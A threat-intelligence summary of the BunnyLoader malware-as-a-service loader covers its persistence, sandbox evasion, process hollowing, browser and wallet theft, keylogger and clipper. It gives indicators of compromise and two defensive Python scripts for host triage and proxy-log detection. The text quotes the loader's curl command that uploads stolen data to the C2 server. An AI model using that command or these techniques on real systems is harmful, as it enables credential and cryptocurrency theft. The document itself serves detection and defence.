BunnyLoader, the newest Malware-as-a-Service

Zscaler ThreatLabz analyzed BunnyLoader, a rapidly developed C/C++ malware-as-a-service loader that performs persistence, anti-analysis, fileless and on-disk payload delivery, keylogging, browser and wallet credential theft, clipboard clipping, and remote command execution. The loader communicates with a centralized C2 (37[.]139[.]129[.]145) for registration, tasking, exfiltration, and heartbeat signals. #BunnyLoader #Zscaler

Key points

  • BunnyLoader is a C/C++ MaaS loader sold on forums and under rapid development with frequent feature updates and bug fixes.
  • It establishes persistence by creating a Run registry value named “Spyware_Blocker” and creates a mutex “BunnyLoader_MUTEXCONTROL”.
  • The loader applies multiple anti-analysis checks (module checks, WMI queries, sandbox usernames, Docker cgroup) and aborts with an error if a sandbox is detected.
  • BunnyLoader registers with a C2 (37[.]139[.]129[.]145), polls for tasks, and supports modules for download-and-execute (fileless and disk), stealer, keylogger, clipper, and remote command execution.
  • Fileless delivery is implemented via a suspended notepad.exe and process hollowing; stolen data is compressed with System.IO.Compression.ZipFile and exfiltrated with curl to the C2.
  • Stealer functionality targets many Chromium-based and other browsers, multiple desktop cryptocurrency wallets, VPN clients (ProtonVPN/OpenVPN), and messaging apps, aggregating logs into BunnyLogs for upload.

MITRE Techniques

  • [T1547.001] Registry Run Keys/Startup Folder – Persists by creating a Run registry value named ‘Spyware_Blocker’ in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (‘Creates a new registry value named “Spyware_Blocker” in the Run registry key … where the value is the path to the BunnyLoader binary.’).
  • [T1497] Virtualization/Sandbox Evasion – Detects sandbox/VM environments via module checks, WMI queries, username blacklists and container cgroup checks (‘Performs the following anti-VM techniques:’ and ‘Checks for a Docker container via “/proc/1/cgroup” – if the container exists, BunnyLoader does not perform further malicious actions.’).
  • [T1055.012] Process Hollowing (Process Injection) – Implements fileless execution by creating a suspended notepad.exe and injecting downloaded payload bytes into its memory (‘creates a “notepad.exe” process in a suspended state … performs Process Hollowing to inject the downloaded payload into the “notepad.exe” process’).
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – Uses HTTP GET/POST requests for registration, task retrieval, heartbeat, and result reporting to C2 endpoints (e.g., ‘GET /Bunny/Add.php?… Host: 37[.]139[.]129[.]145’ and other HTTP examples shown).
  • [T1041] Exfiltration Over C2 Channel – Exfiltrates collected data by compressing BunnyLogs into a ZIP and uploading via curl to the C2 (‘cmd.exe /c curl -F “file=@C:\Users\user\AppData\Local\BunnyLogs_468325.zip” http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php’).
  • [T1056.001] Keylogging – Implements a basic keylogger using GetAsyncKeyState() and writes keystrokes to ‘C:\Users\<username>\AppData\Local\Keystrokes.txt’ (‘implements a basic keylogger using GetAsyncKeyState() … stored in the file “C:\Users\<username>\AppData\Local\Keystrokes.txt”’).
  • [T1115] Clipboard Data – Monitors and replaces clipboard contents matching cryptocurrency addresses with actor-controlled addresses (‘clipper checks a victim’s clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.’).
  • [T1555.003] Credentials from Web Browsers – Steals browser autofill, saved passwords, credit cards and history from many Chromium-based and other browser profiles (‘BunnyLoader steals following information from these web browsers: AutoFill data, Credit cards, Downloads, History, Passwords’).
  • [T1059] Command and Scripting Interpreter – Executes remote commands received from C2 using _popen, parsing commands like ‘help’, ‘cd’, ‘pwd’ and returning output to the C2 (‘BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd” and then executes the command using _popen’).

Indicators of Compromise

  • [IP/Domain] C2 server – 37[.]139[.]129[.]145/Bunny/ (used for registration, tasking, uploads, heartbeat, and other endpoints).
  • [URLs/Endpoints] C2 API paths – /Bunny/Add.php, /Bunny/TaskHandler.php, /Bunny/Uploader.php, /Bunny/StealerRegistration.php, /Bunny/Echoer.php (used for registration, task retrieval, exfiltration, stealer registration, and remote commands).
  • [File Hashes] BunnyLoader samples – dbf727e1effc3631ae634d95a0d88bf3, bbf53c2f20ac95a3bc18ea7575f2344b, 59ac3eacd67228850d5478fd3f18df78.
  • [Filenames/Artifacts] Local artifacts – C:\Users\<username>\AppData\Local\Keystrokes.txt (keylogger output), BunnyLogs_.zip (archived stealer logs) and the BunnyLogs folder in AppData\Local.
  • [Registry] Persistence key – HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run value ‘Spyware_Blocker’ (points to the BunnyLoader binary).

BunnyLoader establishes persistence and stealth before contacting its C2. On execution it hides its window, creates the mutex “BunnyLoader_MUTEXCONTROL”, and writes a Run key value ‘Spyware_Blocker’ under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run to maintain startup persistence. The loader runs a suite of anti-analysis checks (module presence checks for security/sandbox DLLs, WMI queries across Win32 classes, Docker cgroup checks, and a blacklist of sandbox usernames) and will abort with a compatibility-style error if a sandbox or VM is detected.
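The host-side indicators above (the Run value name, the mutex name and the AppData\Local artifacts) can be turned into a small triage script. The following is an added example, not Zscaler's or the loader's code: the checks are pure functions over a snapshot so they can be tested anywhere, the live Run-key collector uses the standard `winreg` module and only runs on Windows, and the snapshot values (`loader.exe`, the sample mutex list, the `exists` callback) are constructed. The "review" heuristic that flags any Run entry launching from AppData\Local is an assumption of this example, not something the write-up states.

```python
"""Host triage for BunnyLoader persistence and on-disk artifacts (added example)."""
import ntpath
import sys
from dataclasses import dataclass
from typing import Callable, Dict, List

# Indicators taken from the write-up above.
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "Spyware_Blocker"
MUTEX_NAME = "BunnyLoader_MUTEXCONTROL"
ARTIFACT_RELPATHS = (r"AppData\Local\Keystrokes.txt", r"AppData\Local\BunnyLogs")


@dataclass
class Finding:
    kind: str    # "persistence", "mutex", "artifact" or "review"
    detail: str


def check_run_values(run_values: Dict[str, str]) -> List[Finding]:
    """run_values maps Run-key value names to their data (the launched path)."""
    findings = []
    for name, data in run_values.items():
        if name == RUN_VALUE_NAME:
            findings.append(Finding("persistence", f"{RUN_KEY}\\{name} = {data}"))
        elif "\\appdata\\local\\" in data.lower():
            # Assumption (heuristic, not from the write-up): Run entries launching
            # from a per-user AppData\Local path deserve a look.
            findings.append(Finding("review", f"Run value {name!r} launches from AppData\\Local: {data}"))
    return findings


def check_mutex_names(mutex_names: List[str]) -> List[Finding]:
    """mutex_names is a list of mutex names enumerated by some external tool."""
    return [Finding("mutex", m) for m in mutex_names if m == MUTEX_NAME]


def check_user_artifacts(profile_dirs: List[str], exists: Callable[[str], bool]) -> List[Finding]:
    """exists(path) -> bool is injected so the check can run against a constructed tree."""
    findings = []
    for profile in profile_dirs:
        for rel in ARTIFACT_RELPATHS:
            path = ntpath.join(profile, rel)  # Windows-style join on any platform
            if exists(path):
                findings.append(Finding("artifact", path))
    return findings


def triage(snapshot: dict) -> List[Finding]:
    """Run all checks over a snapshot dict; order: persistence, mutex, artifact."""
    return (check_run_values(snapshot.get("run_values", {}))
            + check_mutex_names(snapshot.get("mutexes", []))
            + check_user_artifacts(snapshot.get("profiles", []), snapshot.get("exists", lambda p: False)))


def collect_run_values_windows() -> Dict[str, str]:
    """Live collector for the HKLM Run key; Windows only (winreg)."""
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break  # no more values
            values[name] = str(data)
            index += 1
    return values


# Constructed snapshot so the script runs without a Windows host.
SAMPLE_SNAPSHOT = {
    "run_values": {
        "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
        "Spyware_Blocker": r"C:\Users\user\AppData\Local\loader.exe",  # constructed path
    },
    "mutexes": ["Global\\SomeLegitMutex", "BunnyLoader_MUTEXCONTROL"],
    "profiles": [r"C:\Users\user"],
    "exists": lambda p: p in {r"C:\Users\user\AppData\Local\Keystrokes.txt"},
}

if __name__ == "__main__":
    if sys.platform == "win32":
        SAMPLE_SNAPSHOT["run_values"] = collect_run_values_windows()
    for finding in triage(SAMPLE_SNAPSHOT):
        print(f"[{finding.kind}] {finding.detail}")
```

On a live Windows host only the Run-key collector is wired in; mutex enumeration and profile discovery are left to whatever EDR or Sysinternals tooling is already in place, and their output is fed in through the snapshot dict.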

After passing checks, the binary performs HTTP-based registration to the C2 (user agents observed: “BunnyLoader”, “BunnyRequester”), then polls TaskHandler.php for tasks. Tasks map to modules: Trojan Downloader (disk and fileless), Intruder (keylogger and stealer), Clipper (cryptocurrency clipboard replacement), and Remote Command Execution. Fileless delivery uses a suspended notepad.exe and Process Hollowing (injecting the downloaded payload from memory); disk delivery writes the payload to AppData\Local and executes it. The stealer harvests autofill data, passwords, credit cards, downloads and history from numerous Chromium-derived and other browsers, extracts wallet files for many desktop wallets and VPN/messaging credentials, writes collected data to a BunnyLogs folder, compresses it via System.IO.Compression.ZipFile to BunnyLogs_.zip, and uploads it via curl to the C2 uploader endpoint.

Keylogging is implemented with GetAsyncKeyState and saved to Keystrokes.txt; the clipper monitors the clipboard and replaces matched crypto addresses (Bitcoin, Monero, Ethereum, Litecoin, Dogecoin, ZCash, Tether) with attacker-provided addresses delivered from the C2. Remote commands are retrieved via the Echoer.php endpoint, executed locally with _popen (handling commands such as help, cd, pwd), and results are returned to the C2. The loader also issues periodic heartbeat requests to signal online status and sends task-completion and stealer-registration requests (including links to uploaded BunnyLogs) as part of its command-and-control workflow.
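The C2 workflow described in the last two paragraphs (registration, task polling, curl upload, echo endpoint, heartbeat) leaves a distinctive trail in web-proxy logs: the C2 IP, the /Bunny/ endpoint paths and the two user agents. The scanner below is an added example rather than anything from Zscaler or the loader; it matches the write-up's indicators and, going slightly beyond the text, also flags /Bunny/ endpoints on any host and a plain curl POST to Uploader.php, since the IP may change while the PHP paths persist. The log format (`ts src_ip method url status "user_agent"`) and every log line are constructed, and the assumption that the curl-based upload shows a `curl/` user agent is this example's, not the write-up's.

```python
"""Scan proxy logs for BunnyLoader C2 traffic (added example; log format is constructed)."""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import urlsplit

# Indicators from the write-up, de-fanged for matching.
C2_IP = "37.139.129.145"
C2_PATHS = {
    "/Bunny/Add.php": "registration",
    "/Bunny/TaskHandler.php": "task retrieval",
    "/Bunny/Uploader.php": "exfiltration",
    "/Bunny/StealerRegistration.php": "stealer registration",
    "/Bunny/Echoer.php": "remote command",
}
C2_USER_AGENTS = {"BunnyLoader", "BunnyRequester"}

# Constructed log format: timestamp, client IP, method, full URL, status, quoted user agent.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


class Hit(NamedTuple):
    src: str
    reason: str
    line: str


def parse_line(line: str) -> Optional[dict]:
    """Return the named fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec: dict) -> List[str]:
    """List every BunnyLoader indicator a parsed record matches (empty list = benign)."""
    parts = urlsplit(rec["url"])
    host, path, ua = parts.hostname or "", parts.path, rec["ua"]
    reasons = []
    if host == C2_IP:
        reasons.append(f"known C2 IP {C2_IP}")
    if path in C2_PATHS:
        reasons.append(f"C2 endpoint {path} ({C2_PATHS[path]})")
    if ua in C2_USER_AGENTS:
        reasons.append(f"loader user agent {ua!r}")
    # Assumption: the curl-driven ZIP upload presents a curl/ user agent.
    if rec["method"] == "POST" and path.endswith("/Uploader.php") and ua.startswith("curl/"):
        reasons.append("curl POST to Uploader.php (possible BunnyLogs exfiltration)")
    return reasons


def scan(log_text: str) -> List[Hit]:
    """Run classify() over every parseable line and keep the ones that matched."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append(Hit(rec["src"], "; ".join(reasons), line))
    return hits


def hosts_to_isolate(hits: List[Hit]) -> Dict[str, int]:
    """Count matching requests per internal source IP, for triage prioritisation."""
    return dict(Counter(h.src for h in hits))


# Constructed sample log: one infected client talking to the C2, one clean client,
# and one client reaching a /Bunny/ path on a different (constructed) host.
SAMPLE_LOG = """\
2023-10-01T10:00:01Z 10.0.0.7 GET http://37.139.129.145/Bunny/Add.php 200 "BunnyLoader"
2023-10-01T10:00:05Z 10.0.0.7 GET http://37.139.129.145/Bunny/TaskHandler.php 200 "BunnyRequester"
2023-10-01T10:01:00Z 10.0.0.7 POST http://37.139.129.145/Bunny/Uploader.php 200 "curl/8.0.1"
2023-10-01T10:01:30Z 10.0.0.9 GET https://www.example.com/index.html 200 "Mozilla/5.0"
2023-10-01T10:02:00Z 10.0.0.9 GET http://198.51.100.4/Bunny/Echoer.php 200 "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(f"{hit.src}: {hit.reason}")
    print("per-host counts:", hosts_to_isolate(found))
```

Matching on the PHP path independently of the host is deliberate: a new loader build or a moved server keeps the same panel code long after the IP rotates, so the path rule keeps firing when the IP rule goes stale. The curl rule is the noisiest of the four and is best used as corroboration alongside the other three.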

Read more: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service